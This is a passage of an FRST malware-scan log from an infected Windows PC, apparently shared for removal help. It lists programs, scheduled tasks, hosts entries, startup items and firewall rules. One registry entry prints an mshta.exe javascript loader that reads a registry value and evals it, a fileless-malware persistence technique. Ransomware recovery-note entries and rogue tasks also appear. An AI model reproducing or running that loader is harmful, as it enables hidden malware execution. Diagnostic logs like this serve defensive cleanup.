Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
